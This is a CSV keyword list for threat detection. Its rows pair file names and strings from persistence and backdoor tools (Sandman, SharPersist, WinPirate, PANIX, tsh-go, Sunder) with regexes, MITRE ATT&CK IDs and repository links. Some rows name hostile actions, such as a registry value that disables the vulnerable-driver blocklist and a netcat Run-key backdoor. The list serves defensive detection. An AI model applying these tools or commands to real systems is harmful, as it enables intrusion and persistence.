"*\ruler.exe*",".{0,1000}\\ruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*\Safe_mode_AnyDesk.txt*",".{0,1000}\\Safe_mode_AnyDesk\.txt.{0,1000}","offensive_tool_keyword","Dispossessor","notes used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Sandman.exe*",".{0,1000}\\Sandman\.exe.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*\sandman_server.py*",".{0,1000}\\sandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*\SandmanBackdoorTimeProvider.dll*",".{0,1000}\\SandmanBackdoorTimeProvider\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*\Sandman-master.zip*",".{0,1000}\\Sandman\-master\.zip.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*\SchTask.sln*",".{0,1000}\\SchTask\.sln.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*\SchTask.zip*",".{0,1000}\\SchTask\.zip.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*\SchTask_0x727\*",".{0,1000}\\SchTask_0x727\\.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*\SchTaskBackdoor.*",".{0,1000}\\SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*\sdb-explorer.exe*",".{0,1000}\\sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","36","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z"
"*\sdb-explorer.sln*",".{0,1000}\\sdb\-explorer\.sln.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","36","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z"
"*\Seatbelt.sln*",".{0,1000}\\Seatbelt\.sln.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*\Seatbelt\Commands\*",".{0,1000}\\Seatbelt\\Commands\\.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*\Seatbelt\Program.cs*",".{0,1000}\\Seatbelt\\Program\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*\Seatbelt\Seatbelt.cs*",".{0,1000}\\Seatbelt\\Seatbelt\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*\SharPersist\*",".{0,1000}\\SharPersist\\.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*\SharpPersistSD.cs*",".{0,1000}\\SharpPersistSD\.cs.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*\SharpPersistSD.dll*",".{0,1000}\\SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*\SharpPersistSD.sln*",".{0,1000}\\SharpPersistSD\.sln.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*\SharpSC.exe*",".{0,1000}\\SharpSC\.exe.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*\SharpSC-main*",".{0,1000}\\SharpSC\-main.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*\ShimDB\sdb-explorer*",".{0,1000}\\ShimDB\\sdb\-explorer.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","36","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z"
"*\simple-backdoor.php*",".{0,1000}\\simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","N/A","10","","N/A","","",""
"*\Start Menu\Programs\Startup\svchost.exe*",".{0,1000}\\Start\sMenu\\Programs\\Startup\\svchost\.exe.{0,1000}","offensive_tool_keyword","_","known executable in strange location - used by multiple malwares","T1037 - T1059 - T1547","TA0003 - TA0005?","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\stickykey.ps1*",".{0,1000}\\stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*\Stickykeys.sh*",".{0,1000}\\Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\Suborner.sln*",".{0,1000}\\Suborner\.sln.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","9","5","468","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z"
"*\sunder.exe*",".{0,1000}\\sunder\.exe.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","N/A","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*\SYSTEM\CurrentControlSet\Control\CI\Config\ -Name VulnerableDriverBlocklistEnable 0*",".{0,1000}\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config\\\s\-Name\sVulnerableDriverBlocklistEnable\s0.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#registry","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*\Temp\WinAuditDB.accdb*",".{0,1000}\\Temp\\WinAuditDB\.accdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\TortoiseSVNHookScripts.cs*",".{0,1000}\\TortoiseSVNHookScripts\.cs.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*\tsh_windows_amd64.exe*",".{0,1000}\\tsh_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*\tshd.go*",".{0,1000}\\tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*\tshd_windows.go*",".{0,1000}\\tshd_windows\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*\tshd_windows_amd64.exe*",".{0,1000}\\tshd_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*\Use-Waitfor.exe*",".{0,1000}\\Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*\Waitfor-Persistence.ps1*",".{0,1000}\\Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*\Waitfor-Persistence\*",".{0,1000}\\Waitfor\-Persistence\\.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*\Waitfor-Persistence-master*",".{0,1000}\\Waitfor\-Persistence\-master.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*\WinAudit.exe*",".{0,1000}\\WinAudit\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\windows\currentversion\run -v netcat *",".{0,1000}\\windows\\currentversion\\run\s\-v\snetcat\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Windows\Temp\Bla.exe*",".{0,1000}\\Windows\\Temp\\Bla\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*\WinPirate.bat*",".{0,1000}\\WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\WinPirate\Tools\*",".{0,1000}\\WinPirate\\Tools\\.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\WinPirate-master*",".{0,1000}\\WinPirate\-master.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*\WSAAcceptBackdoor.*",".{0,1000}\\WSAAcceptBackdoor\..{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","111","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z"
"*\WSAAcceptBackdoor-main*",".{0,1000}\\WSAAcceptBackdoor\-main.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","111","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z"
"*\XRulez.cpp*",".{0,1000}\\XRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*\XRulez.exe*",".{0,1000}\\XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*\XRulez.sln*",".{0,1000}\\XRulez\.sln.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*\XRulez.zip*",".{0,1000}\\XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*\XRulez\Injector\*",".{0,1000}\\XRulez\\Injector\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*] Cleaning At persistence methods*",".{0,1000}\]\sCleaning\sAt\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Backdoor binaries persistence methods*",".{0,1000}\]\sCleaning\sBackdoor\sbinaries\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Bind shell persistence methods*",".{0,1000}\]\sCleaning\sBind\sshell\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Cron persistence methods*",".{0,1000}\]\sCleaning\sCron\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Docker persistence methods*",".{0,1000}\]\sCleaning\sDocker\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Git persistence methods*",".{0,1000}\]\sCleaning\sGit\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning initd persistence methods*",".{0,1000}\]\sCleaning\sinitd\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Malicious package persistence methods*",".{0,1000}\]\sCleaning\sMalicious\spackage\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning MOTD persistence methods*",".{0,1000}\]\sCleaning\sMOTD\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Package Managers persistence methods*",".{0,1000}\]\sCleaning\sPackage\sManagers\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning rc.local persistence methods*",".{0,1000}\]\sCleaning\src\.local\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning setcap persistence methods*",".{0,1000}\]\sCleaning\ssetcap\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Setuid persistence methods*",".{0,1000}\]\sCleaning\sSetuid\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
